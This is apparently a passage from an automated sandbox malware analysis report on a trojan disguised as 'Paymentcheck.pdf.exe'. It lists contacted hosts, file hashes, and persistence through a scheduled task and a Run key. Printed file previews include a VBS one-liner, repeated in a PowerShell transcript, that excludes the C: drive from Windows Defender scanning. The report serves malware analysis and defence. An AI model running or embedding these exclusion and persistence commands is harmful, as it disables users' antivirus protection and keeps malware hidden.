                        • URL Reputation: safe
                        		unknown
                        http://www.galapagosdesign.com/DPleasePaymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.fontbureau.com/designers8Paymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpfalse
                          		high
                          https://oneget.orgformat.ps1xmlagement.dll2040.missionsandpowershell.exe, 0000000E.00000002.933022255.0000000004B78000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.fonts.comPaymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpfalse
                            		high
                            http://www.sandoll.co.krPaymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.urwpp.deDPleasePaymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.zhongyicts.com.cnPaymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.comttvaPaymentcheck.pdf.exe, 00000000.00000002.821699982.0000000001277000.00000004.00000040.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePaymentcheck.pdf.exe, 00000000.00000002.821957126.0000000002A21000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.931755679.00000000048B4000.00000004.00000001.sdmpfalse
                              		high
                              http://www.sakkal.comPaymentcheck.pdf.exe, 00000000.00000002.840843943.0000000005980000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://oneget.orgpowershell.exe, 0000000E.00000002.933022255.0000000004B78000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown

                              Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public

                              IPDomainCountryFlagASNASN NameMalicious
                              217.138.212.57
                              		unknownUnited Kingdom
                              		9009M247GBtrue

                              General Information

                              Joe Sandbox Version:33.0.0 White Diamond
                              Analysis ID:458302
                              Start date:03.08.2021
                              Start time:08:25:33
                              Joe Sandbox Product:CloudBasic
                              Overall analysis duration:0h 13m 55s
                              Hypervisor based Inspection enabled:false
                              Report type:light
                              Sample file name:Paymentcheck.pdf.exe
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                              Number of analysed new started processes analysed:28
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • HDC enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Detection:MAL
                              Classification:mal100.troj.evad.winEXE@20/21@0/1
                              EGA Information:Failed
                              HDC Information:
                              • Successful, ratio: 6.9% (good quality ratio 5.6%)
                              • Quality average: 59.4%
                              • Quality standard deviation: 30.7%
                              HCA Information:
                              • Successful, ratio: 99%
                              • Number of executed functions: 0
                              • Number of non-executed functions: 0
                              Cookbook Comments:
                              • Adjust boot time
                              • Enable AMSI
                              • Found application associated with file extension: .exe
                              Warnings:
                              Show All
                              • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                              • TCP Packets have been reduced to 100
                              • Not all processes where analyzed, report is missing behavior information
                              • Report creation exceeded maximum time and may have missing disassembly code information.
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              08:27:49Task SchedulerRun new task: DHCP Monitor path: "C:\Users\user\AppData\Local\Temp\RegAsm.exe" s>$(Arg0)
                              08:27:50AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run DHCP Monitor C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                              08:27:51Task SchedulerRun new task: DHCP Monitor Task path: "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" s>$(Arg0)
                              08:28:28API Interceptor11x Sleep call for process: powershell.exe modified

                              Joe Sandbox View / Context

                              IPs

                              No context

                              Domains

                              No context

                              ASN

                              No context

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              No context

                              Created / dropped Files

                              C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                              Process:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):64616
                              Entropy (8bit):6.037264560032456
                              Encrypted:false
                              SSDEEP:768:J8XcJiMjm2ieHlPyCsSuJbn8dBhFVBSMQ6Iq8TSYDKpgLaDViRLNdr:9YMaNylPYSAb8dBnTHv8DKKaDVkX
                              MD5:6FD7592411112729BF6B1F2F6C34899F
                              SHA1:5E5C839726D6A43C478AB0B95DBF52136679F5EA
                              SHA-256:FFE4480CCC81B061F725C54587E9D1BA96547D27FE28083305D75796F2EB3E74
                              SHA-512:21EFCC9DEE3960F1A64C6D8A44871742558666BB792D77ACE91236C7DBF42A6CA77086918F363C4391D9C00904C55A952E2C18BE5FA1A67A509827BFC630070D
                              Malicious:false
                              Antivirus:
                              • Antivirus: Virustotal, Detection: 0%, Browse
                              • Antivirus: Metadefender, Detection: 0%, Browse
                              • Antivirus: ReversingLabs, Detection: 0%
                              Reputation:unknown
                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...xX.Z..............0.............^.... ........@.. ....................... ............`.....................................O.......8...............h>........................................................... ............... ..H............text...d.... ...................... ..`.rsrc...8...........................@..@.reloc..............................@..B................@.......H........A...p..........T................................................~P...-.r...p.....(....(....s.....P...*..0.."........(......-.r...p.rI..p(....s....z.*...0..........(....~P.....o......*..(....*n(.....(..........%...(....*~(.....(..........%...%...(....*.(.....(..........%...%...%...(....*V.(......}Q.....}R...*..{Q...*..{R...*...0...........(.......i.=...}S......i.@...}T......i.@...}U.....+m...(....o .....r]..p.o!...,..{T.......{U........o"....+(.ra..p.o!...,..{T.......
                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Paymentcheck.pdf.exe.log
                              Process:C:\Users\user\Desktop\Paymentcheck.pdf.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:modified
                              Size (bytes):1119
                              Entropy (8bit):5.356708753875314
                              Encrypted:false
                              SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzd
                              MD5:3197B1D4714B56F2A6AC9E83761739AE
                              SHA1:3B38010F0DF51C1D4D2C020138202DABB686741D
                              SHA-256:40586572180B85042FEFED9F367B43831C5D269751D9F3940BBC29B41E18E9F6
                              SHA-512:58EC975A53AD9B19B425F6C6843A94CC280F794D436BBF3D29D8B76CA1E8C2D8883B3E754F9D4F2C9E9387FE88825CCD9919369A5446B1AFF73EDBE07FA94D88
                              Malicious:true
                              Reputation:unknown
                              Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.log
                              Process:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:modified
                              Size (bytes):42
                              Entropy (8bit):4.0050635535766075
                              Encrypted:false
                              SSDEEP:3:QHXMKa/xwwUy:Q3La/xwQ
                              MD5:84CFDB4B995B1DBF543B26B86C863ADC
                              SHA1:D2F47764908BF30036CF8248B9FF5541E2711FA2
                              SHA-256:D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
                              SHA-512:485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
                              Malicious:false
                              Reputation:unknown
                              Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..
                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\dhcpmon.exe.log
                              Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:modified
                              Size (bytes):42
                              Entropy (8bit):4.0050635535766075
                              Encrypted:false
                              SSDEEP:3:QHXMKa/xwwUy:Q3La/xwQ
                              MD5:84CFDB4B995B1DBF543B26B86C863ADC
                              SHA1:D2F47764908BF30036CF8248B9FF5541E2711FA2
                              SHA-256:D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
                              SHA-512:485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
                              Malicious:false
                              Reputation:unknown
                              Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..
                              C:\Users\user\AppData\Local\Temp\RegAsm.exe
                              Process:C:\Users\user\Desktop\Paymentcheck.pdf.exe
                              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):64616
                              Entropy (8bit):6.037264560032456
                              Encrypted:false
                              SSDEEP:768:J8XcJiMjm2ieHlPyCsSuJbn8dBhFVBSMQ6Iq8TSYDKpgLaDViRLNdr:9YMaNylPYSAb8dBnTHv8DKKaDVkX
                              MD5:6FD7592411112729BF6B1F2F6C34899F
                              SHA1:5E5C839726D6A43C478AB0B95DBF52136679F5EA
                              SHA-256:FFE4480CCC81B061F725C54587E9D1BA96547D27FE28083305D75796F2EB3E74
                              SHA-512:21EFCC9DEE3960F1A64C6D8A44871742558666BB792D77ACE91236C7DBF42A6CA77086918F363C4391D9C00904C55A952E2C18BE5FA1A67A509827BFC630070D
                              Malicious:true
                              Antivirus:
                              • Antivirus: Virustotal, Detection: 0%, Browse
                              • Antivirus: Metadefender, Detection: 0%, Browse
                              • Antivirus: ReversingLabs, Detection: 0%
                              Reputation:unknown
                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...xX.Z..............0.............^.... ........@.. ....................... ............`.....................................O.......8...............h>........................................................... ............... ..H............text...d.... ...................... ..`.rsrc...8...........................@..@.reloc..............................@..B................@.......H........A...p..........T................................................~P...-.r...p.....(....(....s.....P...*..0.."........(......-.r...p.rI..p(....s....z.*...0..........(....~P.....o......*..(....*n(.....(..........%...(....*~(.....(..........%...%...(....*.(.....(..........%...%...%...(....*V.(......}Q.....}R...*..{Q...*..{R...*...0...........(.......i.=...}S......i.@...}T......i.@...}U.....+m...(....o .....r]..p.o!...,..{T.......{U........o"....+(.ra..p.o!...,..{T.......
                              C:\Users\user\AppData\Local\Temp\_Voymjqpmrcebffsjwfsb.vbs
                              Process:C:\Users\user\Desktop\Paymentcheck.pdf.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):183
                              Entropy (8bit):4.996304200597312
                              Encrypted:false
                              SSDEEP:3:FER/n0eFHgSSJJF2uV1HeGAFddGeWLCXknRAut+kiEaKC5SufyM1K/RFofD6TRWx:FER/lFHsCu/eGgdEYmRAuwknaZ5SuH1D
                              MD5:7A70E43727FA98EE052774DD83D19A21
                              SHA1:17B818FD7465E1EBBAFBFDAD7645B9B1B4916F71
                              SHA-256:B89E52891531303B67688453F3C3CF35A703347A79E42BC19B4CD028815A6620
                              SHA-512:B36610E59CD7EBEFE413E3895B88BD184DC8A386F35A568F73D0A4C3E98F5BA04ED9F8CD124886C709469EA57F22192A57EFF627B1928D6B36733EE2F33C6986
                              Malicious:true
                              Reputation:unknown
                              Preview: CreateObject("WScript.Shell").Run "powershell Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\csrsss\msbuildd.exe'", 0, False
                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kehsj010.euk.psm1
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:very short file (no magic)
                              Category:dropped
                              Size (bytes):1
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:3:U:U
                              MD5:C4CA4238A0B923820DCC509A6F75849B
                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                              Malicious:false
                              Reputation:unknown
                              Preview: 1
                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wciuifo5.2ha.ps1
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:very short file (no magic)
                              Category:dropped
                              Size (bytes):1
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:3:U:U
                              MD5:C4CA4238A0B923820DCC509A6F75849B
                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                              Malicious:false
                              Reputation:unknown
                              Preview: 1
                              C:\Users\user\AppData\Local\Temp\tmp715E.tmp
                              Process:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1307
                              Entropy (8bit):5.101975891238948
                              Encrypted:false
                              SSDEEP:24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0Yfa5xtn:cbk4oL600QydbQxIYODOLedq3ja5j
                              MD5:36C3A95160862C73B9B16754B2473BAF
                              SHA1:5957A8FD60A7100853CEC24FA250F95BD0CE6379
                              SHA-256:2B59AC4D549FB914694F5BE05D2668666C546ACAAD5855703D0C0DCDBC57068D
                              SHA-512:CFF3F0A3A2BFBE57F95CAC2DE28CC9C10A0DAE141040EEE01819F96C4218179841B7E50C44F225CF20144A94D5F734138BC0BF049D889F4314B394629B10D6BC
                              Malicious:true
                              Reputation:unknown
                              Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak
                              C:\Users\user\AppData\Local\Temp\tmp7DD3.tmp
                              Process:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1310
                              Entropy (8bit):5.109425792877704
                              Encrypted:false
                              SSDEEP:24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0R3xtn:cbk4oL600QydbQxIYODOLedq3S3j
                              MD5:5C2F41CFC6F988C859DA7D727AC2B62A
                              SHA1:68999C85FC7E37BAB9216E0099836D40D4545C1C
                              SHA-256:98B6E66B6C2173B9B91FC97FE51805340EFDE978B695453742EBAB631018398B
                              SHA-512:B5DA5DA378D038AFBF8A7738E47921ED39F9B726E2CAA2993D915D9291A3322F94EFE8CCA6E7AD678A670DB19926B22B20E5028460FCC89CEA7F6635E7557334
                              Malicious:false
                              Reputation:unknown
                              Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak
                              C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\catalog.dat
                              Process:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):232
                              Entropy (8bit):7.024371743172393
                              Encrypted:false
                              SSDEEP:6:X4LDAnybgCFcpJSQwP4d7ZrqJgTFwoaw+9XU4:X4LEnybgCFCtvd7ZrCgpwoaw+Z9
                              MD5:32D0AAE13696FF7F8AF33B2D22451028
                              SHA1:EF80C4E0DB2AE8EF288027C9D3518E6950B583A4
                              SHA-256:5347661365E7AD2C1ACC27AB0D150FFA097D9246BB3626FCA06989E976E8DD29
                              SHA-512:1D77FC13512C0DBC4EFD7A66ACB502481E4EFA0FB73D0C7D0942448A72B9B05BA1EA78DDF0BE966363C2E3122E0B631DB7630D044D08C1E1D32B9FB025C356A5
                              Malicious:false
                              Reputation:unknown
                              Preview: Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.
                              C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
                              Process:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                              File Type:Non-ISO extended-ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):8
                              Entropy (8bit):3.0
                              Encrypted:false
                              SSDEEP:3:Fn4:2
                              MD5:8B3B9D6BBA20F384B042BE6D1B0558BE
                              SHA1:411EBC808586DA365028E37A1619FEFFB20B7247
                              SHA-256:543DFB4810139C95BEAA208EFFCCAEE38F6694A71391AFD0E584F87D17FEE8F8
                              SHA-512:E8B0F322CC92C23FCF6D57C04E33C08001F867D2F5B2203A1E1EC3BBA06CB4D4A9A3E6D07797C60D849CF4845EA85FD1533366AA07F66708C97CBBE71BD5077B
                              Malicious:true
                              Reputation:unknown
                              Preview: .1?.GV.H
                              C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\settings.bin
                              Process:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):40
                              Entropy (8bit):5.153055907333276
                              Encrypted:false
                              SSDEEP:3:9bzY6oRDT6P2bfVn1:RzWDT621
                              MD5:4E5E92E2369688041CC82EF9650EDED2
                              SHA1:15E44F2F3194EE232B44E9684163B6F66472C862
                              SHA-256:F8098A6290118F2944B9E7C842BD014377D45844379F863B00D54515A8A64B48
                              SHA-512:1B368018907A3BC30421FDA2C935B39DC9073B9B1248881E70AD48EDB6CAA256070C1A90B97B0F64BBE61E316DBB8D5B2EC8DBABCD0B0B2999AB50B933671ECB
                              Malicious:false
                              Reputation:unknown
                              Preview: 9iH...}Z.4..f.~a........~.~.......3.U.
                              C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\storage.dat
                              Process:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):327432
                              Entropy (8bit):7.99938831605763
                              Encrypted:true
                              SSDEEP:6144:oX44S90aTiB66x3Pl6nGV4bfD6wXPIZ9iBj0UeprGm2d7Tm:LkjYGsfGUc9iB4UeprKdnm
                              MD5:7E8F4A764B981D5B82D1CC49D341E9C6
                              SHA1:D9F0685A028FB219E1A6286AEFB7D6FCFC778B85
                              SHA-256:0BD3AAC12623520C4E2031C8B96B4A154702F36F97F643158E91E987D317B480
                              SHA-512:880E46504FCFB4B15B86B9D8087BA88E6C4950E433616EBB637799F42B081ABF6F07508943ECB1F786B2A89E751F5AE62D750BDCFFDDF535D600CF66EC44E926
                              Malicious:false
                              Reputation:unknown
                              Preview: pT..!..W..G.J..a.).@.i..wpK.so@...5.=.^..Q.oy.=e@9.B...F..09u"3.. 0t..RDn_4d.....E...i......~...|..fX_...Xf.p^......>a..$...e.6:7d.(a.A...=.)*.....{B.[...y%.*..i.Q.<..xt.X..H.. ..HF7g...I.*3.{.n....L.y;i..s-....(5i...........J.5b7}..fK..HV..,...0.... ....n.w6PMl.......v."".v.......#..X.a....../...cC...i..l{>5n.._+.e.d'...}...[..../...D.t..GVp.zz......(...o......b...+`J.{....hS1G.^*I..v&.jm.#u..1..Mg!.E..U.T.....6.2>...6.l.K.w"o..E..."K%{....z.7....<...,....]t.:.....[.Z.u...3X8.QI..j_.&..N..q.e.2...6.R.~..9.Bq..A.v.6.G..#y.....O....Z)G...w..E..k(....+..O..........Vg.2xC......O...jc.....z..~.P...q../.-.'.h.._.cj.=..B.x.Q9.pu.|i4...i...;O...n.?.,. ....v?.5}.OY@.dG|<.._[.69@.2..m..I..oP=...xrK.?............b..5....i&...l.c\b}..Q..O+.V.mJ.....pz....>F.......H...6$...d...|m...N..1.R..B.i..........$....$........CY}..$....r.....H...8...li.....7 P......?h....R.iF..6...q(.@LI.s..+K.....?m..H....*. l..&<}....`|.B....3.....I..o...u1..8i=.z.W..7
                              C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\task.dat
                              Process:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):44
                              Entropy (8bit):4.220128777433188
                              Encrypted:false
                              SSDEEP:3:oNt+kiE2J5xAI0L4A:oNwkn23f0L4A
                              MD5:DEC3CF19509608C057474F6AD7FD7D55
                              SHA1:1829E7C7674B0EB55E32C5D4F57794762CEB62E2
                              SHA-256:BEAEBCA6CB064C7FA901C228281DD1C8A694EF252A178CDF96B9D4E56C4093E9
                              SHA-512:6E258F21C3361168E01C0464DE3C7A100F01E51069F18559BA1280CE9D4302F81B0DF273558EABC165C6547074D74A6C5FDBA86E6841EF3D704F1D43FAD142E7
                              Malicious:false
                              Reputation:unknown
                              Preview: C:\Users\user\AppData\Local\Temp\RegAsm.exe
                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\csrsss\msbuildd.exe
                              Process:C:\Users\user\Desktop\Paymentcheck.pdf.exe
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):486400
                              Entropy (8bit):7.954045447359108
                              Encrypted:false
                              SSDEEP:12288:N/vJVn4mZTs+EWEI69JHelW2Mm3XrtJ7aneX:tMmZTs+qVGWtm35N
                              MD5:B7E3C3C9735D6BA37616D791171FE2DB
                              SHA1:8763C22ED1151EC2C5B584415154EC7E3C50D964
                              SHA-256:91B97FB3F4695FD57C723B537C5B811195F9F99B0AC6033835F75444C36712B9
                              SHA-512:E19725DA6B7673860A1AA22B473FA59C38FC81A989969A11327A708D9289B2695976D3DFE1D6467D429FA3358D5CF0B022C14CA9862CFF68DAE2EEBADEE4C95D
                              Malicious:true
                              Antivirus:
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 33%
                              Reputation:unknown
                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....f/...............0..:...0......>X... ...`....@.. ....................................@..................................W..K....`...,........................................................................... ............... ..H............text...D8... ...:.................. ..`.rsrc....,...`.......<..............@..@.reloc...............j..............@..B................ X......H.......`A..\2....../....s..,.............................................(....*..(....*..(....*..(....*..(....*..(....*..(....*..(....*.0..C........(....8....8........E........8....*.(.... ....~x...:....& ....8......s....o....*.0.......... ........8........E....7.......G...82....{....9.... ....~....:....& ....8....*..(....8.....{....o....8.....9.... ....~e...:....&8........0.......... ........8........E....Q...................$...8L...."...A"...As....(.... ....8......(.... .
                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\csrsss\msbuildd.exe:Zone.Identifier
                              Process:C:\Users\user\Desktop\Paymentcheck.pdf.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):26
                              Entropy (8bit):3.95006375643621
                              Encrypted:false
                              SSDEEP:3:ggPYV:rPYV
                              MD5:187F488E27DB4AF347237FE461A079AD
                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                              Malicious:true
                              Reputation:unknown
                              Preview: [ZoneTransfer]....ZoneId=0
                              C:\Users\user\Documents\20210803\PowerShell_transcript.377142.Y6wKq0_c.20210803082749.txt
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):944
                              Entropy (8bit):5.321323527131212
                              Encrypted:false
                              SSDEEP:24:BxSA4y7vBZKx2DOXUWM0Viu4muVMzeWkHjeTKKjX4CIym1ZJXfu4muVMzy:BZvvjKoOHUmuakqDYB1Z5mub
                              MD5:82DD5A528149B597B080FDBC21B72677
                              SHA1:D13F18C05FD0FE98A90D68FB2A52A165CCBD8572
                              SHA-256:3982DEA623BA240B8F2DBAAFD89E38EB656FBEE84B72FBAB2F45E0F5D005A41D
                              SHA-512:4C0DBF6F966E4ED438E33464575FFBAFA71B24BF109AAFC8B6D4443327E2CCD70188FF234FE5F4E316731949CFC2F3BF9C0EF9FC6B6F74DF8B70E33FB4ABB20E
                              Malicious:false
                              Reputation:unknown
                              Preview: .**********************..Windows PowerShell transcript start..Start time: 20210803082814..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 377142 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\csrsss\msbuildd.exe'..Process ID: 6860..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210803082815..**********************..PS>Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\csrsss\msbuildd.exe'..
                              \Device\ConDrv
                              Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
